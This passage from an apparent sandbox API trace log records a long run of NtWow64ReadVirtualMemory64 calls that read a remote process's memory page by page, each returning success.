BaseAddress=0x77f48000, Buffer=0x7ff9, BufferSize=0x2738000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.824] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f49000, Buffer=0x7ff9, BufferSize=0x2739000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.824] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f4a000, Buffer=0x7ff9, BufferSize=0x273a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.824] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f4b000, Buffer=0x7ff9, BufferSize=0x273b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.824] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f4c000, Buffer=0x7ff9, BufferSize=0x273c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.824] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f4d000, Buffer=0x7ff9, BufferSize=0x273d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.824] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f4e000, Buffer=0x7ff9, BufferSize=0x273e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.824] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f4f000, Buffer=0x7ff9, BufferSize=0x273f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.824] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f50000, Buffer=0x7ff9, BufferSize=0x2740000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.824] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f51000, Buffer=0x7ff9, BufferSize=0x2741000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.824] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f52000, Buffer=0x7ff9, BufferSize=0x2742000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.825] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f53000, Buffer=0x7ff9, BufferSize=0x2743000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.825] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f54000, Buffer=0x7ff9, BufferSize=0x2744000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.825] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f55000, Buffer=0x7ff9, BufferSize=0x2745000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.825] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f56000, Buffer=0x7ff9, BufferSize=0x2746000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.827] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f57000, Buffer=0x7ff9, BufferSize=0x2747000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.828] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f58000, Buffer=0x7ff9, BufferSize=0x2748000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.828] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f59000, Buffer=0x7ff9, BufferSize=0x2749000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.828] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f5a000, Buffer=0x7ff9, BufferSize=0x274a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.828] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f5b000, Buffer=0x7ff9, BufferSize=0x274b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.828] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f5c000, Buffer=0x7ff9, BufferSize=0x274c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.828] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f5d000, Buffer=0x7ff9, BufferSize=0x274d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.828] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f5e000, Buffer=0x7ff9, BufferSize=0x274e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.828] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f5f000, Buffer=0x7ff9, BufferSize=0x274f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.828] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f60000, Buffer=0x7ff9, BufferSize=0x2750000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.829] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f61000, Buffer=0x7ff9, BufferSize=0x2751000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.829] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f62000, Buffer=0x7ff9, BufferSize=0x2752000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.829] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f63000, Buffer=0x7ff9, BufferSize=0x2753000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.829] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f64000, Buffer=0x7ff9, BufferSize=0x2754000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.829] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f65000, Buffer=0x7ff9, BufferSize=0x2755000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.829] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f66000, Buffer=0x7ff9, BufferSize=0x2756000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.829] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f67000, Buffer=0x7ff9, BufferSize=0x2757000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.829] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f68000, Buffer=0x7ff9, BufferSize=0x2758000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.829] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f69000, Buffer=0x7ff9, BufferSize=0x2759000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.829] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f6a000, Buffer=0x7ff9, BufferSize=0x275a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.830] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f6b000, Buffer=0x7ff9, BufferSize=0x275b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.830] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f6c000, Buffer=0x7ff9, BufferSize=0x275c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.830] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f6d000, Buffer=0x7ff9, BufferSize=0x275d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.830] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f6e000, Buffer=0x7ff9, BufferSize=0x275e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.830] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f6f000, Buffer=0x7ff9, BufferSize=0x275f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.830] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f70000, Buffer=0x7ff9, BufferSize=0x2760000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.830] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f71000, Buffer=0x7ff9, BufferSize=0x2761000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.830] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f72000, Buffer=0x7ff9, BufferSize=0x2762000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.830] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f73000, Buffer=0x7ff9, BufferSize=0x2763000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.831] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f74000, Buffer=0x7ff9, BufferSize=0x2764000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.831] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f75000, Buffer=0x7ff9, BufferSize=0x2765000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.831] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f76000, Buffer=0x7ff9, BufferSize=0x2766000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.831] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f77000, Buffer=0x7ff9, BufferSize=0x2767000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.831] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f78000, Buffer=0x7ff9, BufferSize=0x2768000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.831] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f79000, Buffer=0x7ff9, BufferSize=0x2769000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.831] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f7a000, Buffer=0x7ff9, BufferSize=0x276a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.831] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f7b000, Buffer=0x7ff9, BufferSize=0x276b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.831] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f7c000, Buffer=0x7ff9, BufferSize=0x276c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.831] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f7d000, Buffer=0x7ff9, BufferSize=0x276d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.832] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f7e000, Buffer=0x7ff9, BufferSize=0x276e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.832] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f7f000, Buffer=0x7ff9, BufferSize=0x276f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.832] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f80000, Buffer=0x7ff9, BufferSize=0x2770000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.832] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f81000, Buffer=0x7ff9, BufferSize=0x2771000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.832] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f82000, Buffer=0x7ff9, BufferSize=0x2772000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.832] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f83000, Buffer=0x7ff9, BufferSize=0x2773000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.832] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f84000, Buffer=0x7ff9, BufferSize=0x2774000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.832] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f85000, Buffer=0x7ff9, BufferSize=0x2775000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.832] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f86000, Buffer=0x7ff9, BufferSize=0x2776000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.833] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f87000, Buffer=0x7ff9, BufferSize=0x2777000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.833] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f88000, Buffer=0x7ff9, BufferSize=0x2778000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.833] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f89000, Buffer=0x7ff9, BufferSize=0x2779000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.833] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f8a000, Buffer=0x7ff9, BufferSize=0x277a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.833] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f8b000, Buffer=0x7ff9, BufferSize=0x277b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.833] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f8c000, Buffer=0x7ff9, BufferSize=0x277c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.833] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f8d000, Buffer=0x7ff9, BufferSize=0x277d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.833] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f8e000, Buffer=0x7ff9, BufferSize=0x277e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.833] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f8f000, Buffer=0x7ff9, BufferSize=0x277f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.833] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f90000, Buffer=0x7ff9, BufferSize=0x2780000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.833] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f91000, Buffer=0x7ff9, BufferSize=0x2781000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.834] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f92000, Buffer=0x7ff9, BufferSize=0x2782000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.834] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f93000, Buffer=0x7ff9, BufferSize=0x2783000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.834] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f94000, Buffer=0x7ff9, BufferSize=0x2784000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.834] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f95000, Buffer=0x7ff9, BufferSize=0x2785000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.834] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f96000, Buffer=0x7ff9, BufferSize=0x2786000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.834] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f97000, Buffer=0x7ff9, BufferSize=0x2787000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.834] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f98000, Buffer=0x7ff9, BufferSize=0x2788000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.834] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f99000, Buffer=0x7ff9, BufferSize=0x2789000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.834] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f9a000, Buffer=0x7ff9, BufferSize=0x278a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.834] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f9b000, Buffer=0x7ff9, BufferSize=0x278b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.834] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f9c000, Buffer=0x7ff9, BufferSize=0x278c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.834] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f9d000, Buffer=0x7ff9, BufferSize=0x278d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.835] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f9e000, Buffer=0x7ff9, BufferSize=0x278e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.835] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f9f000, Buffer=0x7ff9, BufferSize=0x278f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.835] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fa0000, Buffer=0x7ff9, BufferSize=0x2790000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.835] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fa1000, Buffer=0x7ff9, BufferSize=0x2791000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.835] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fa2000, Buffer=0x7ff9, BufferSize=0x2792000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.835] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fa3000, Buffer=0x7ff9, BufferSize=0x2793000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.835] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fa4000, Buffer=0x7ff9, BufferSize=0x2794000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.835] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fa5000, Buffer=0x7ff9, BufferSize=0x2795000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.835] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fa6000, Buffer=0x7ff9, BufferSize=0x2796000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.835] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fa7000, Buffer=0x7ff9, BufferSize=0x2797000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.835] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fa8000, Buffer=0x7ff9, BufferSize=0x2798000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.836] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fa9000, Buffer=0x7ff9, BufferSize=0x2799000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.836] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77faa000, Buffer=0x7ff9, BufferSize=0x279a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.836] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fab000, Buffer=0x7ff9, BufferSize=0x279b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.836] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fac000, Buffer=0x7ff9, BufferSize=0x279c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.836] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fad000, Buffer=0x7ff9, BufferSize=0x279d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.836] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fae000, Buffer=0x7ff9, BufferSize=0x279e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.836] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77faf000, Buffer=0x7ff9, BufferSize=0x279f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.836] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fb0000, Buffer=0x7ff9, BufferSize=0x27a0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.836] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fb1000, Buffer=0x7ff9, BufferSize=0x27a1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.836] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fb2000, Buffer=0x7ff9, BufferSize=0x27a2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.836] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fb3000, Buffer=0x7ff9, BufferSize=0x27a3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.836] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fb4000, Buffer=0x7ff9, BufferSize=0x27a4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.837] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fb5000, Buffer=0x7ff9, BufferSize=0x27a5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.837] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fb6000, Buffer=0x7ff9, BufferSize=0x27a6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.837] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fb7000, Buffer=0x7ff9, BufferSize=0x27a7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.837] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fb8000, Buffer=0x7ff9, BufferSize=0x27a8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.837] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fb9000, 